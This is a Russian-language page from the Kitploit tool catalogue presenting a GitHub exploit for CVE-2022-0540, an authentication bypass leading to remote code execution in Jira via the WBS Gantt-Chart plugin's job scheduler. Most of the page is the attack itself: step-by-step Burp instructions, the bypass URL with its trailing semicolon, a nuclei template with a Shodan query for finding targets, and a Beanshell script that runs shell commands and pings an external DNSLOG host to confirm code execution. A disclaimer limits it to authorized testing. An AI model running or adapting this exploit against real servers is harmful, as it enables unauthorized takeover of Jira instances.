Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-0540-RCE — Atlassian Jira Seraph Обход аутентификации RCE(CVE-2022-0540) | Kitploit
Инструменты/GitHubGitHub/pear1y/cve-2022-0540-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияРазработка Полезной Нагрузки
GitHubpear1y/cve-2022-0540-rce

CVE-2022-0540-RCE

Atlassian Jira Seraph Обход аутентификации RCE(CVE-2022-0540)

Репозиторий
711334 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Atlassian Jira Seraph: обход аутентификации и RCE (CVE-2022-0540)

Английский • Китайский

Детали эксплуатации

Как видно из блога автора, Atlassian предоставил длинный список затронутых плагинов (подавляющее большинство из которых были ложными срабатываниями), а автор перечислил несколько действительно затронутых плагинов.

image-20220525190523282

Согласно указанным условиям, в сочетании с официальной документацией для WBS Gantt-Chart for Jira

image-20220525190607569

По сути, это RCE с использованием скрипта Beanshell модуля планировщика задач Task. Детали эксплуатации приведены ниже.

  1. Для ручной работы лучше использовать функцию замены BurpSuite Proxy > Options > Match and Replace, отредактируйте правило.

image-20220525190640472

  1. Используйте Burp в качестве прокси для доступа к уязвимому ПО Jira, откройте http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa;, затем вы можете проверить конфигурацию планировщика заданий

image-20220525190657966

Поскольку наш конечный скрипт Beanshell выполняется как запланированная задача, вы можете изменить интервал выполнения для удобства, нажав Edit и изменив его в соответствии с форматом Cron.

  1. Создайте задачу

image-20220525190713512

  1. Настройте задачу

image-20220525190728145

После завершения настройки нажмите Update, но произойдет переход на страницу входа. Не беспокойтесь, задача на самом деле была добавлена в фоне.

  1. Включите задачу

image-20220525190740547

Новая задача по умолчанию отключена, вам нужно вручную изменить ее состояние на Включено, затем подождать несколько секунд для выполнения скрипта.

  1. Запись DNSLOG

image-20220525190756503

В то же время вы можете увидеть уведомление о завершении выполнения в планировщике заданий.

image-20220525190830668


Предварительные условия

root@kitploit:~
WBS Gantt-Chart for Jira <= 9.14.3.1

Проверка эксплуатабельности

root@kitploit:~
id: CVE-2022-0540

info:
  name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
  author: DhiyaneshDK
  severity: critical
  description: |
    Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
    - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0540
    cwe-id: CWE-287
  metadata:
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2022,atlassian,jira,exposure,auth-bypass

requests:
  - method: GET
    path:
      - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'WBS Gantt-Chart'

      - type: regex
        regex:
          - '<td headers="name">([.|\D]*?)</td>'
        dsl: []

      - type: status
        status:
          - 200

Демонстрация запуска

root@kitploit:~
nuclei -l targets.txt -t exploit.yaml

Скриншот

image-20220525173951955

Ссылки

https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/

https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate

Скрипт Beanshell

root@kitploit:~
import java.io.IOException;
import java.lang.*;

Runtime runtime = Runtime.getRuntime();

try {

    String command = "ping -nc 1 55d2721a.dns.1433.eu.org";

    if (System.getProperty("os.name").toLowerCase().contains("windows")) {
    	runtime.exec(new String[]{"cmd.exe", "/c", command});
    } else {
    	runtime.exec(new String[]{"/bin/bash", "-c", command});
    }

} catch (IOException e) {
    e.printStackTrace();
}

Упомянутая в этой статье информация предназначена только для законного, авторизованного тестирования на проникновение, внутренних проверок безопасности и исследований. Пользователь несет ответственность за любые неблагоприятные последствия, возникающие в результате использования информации, представленной в этой статье.

Скачать инструмент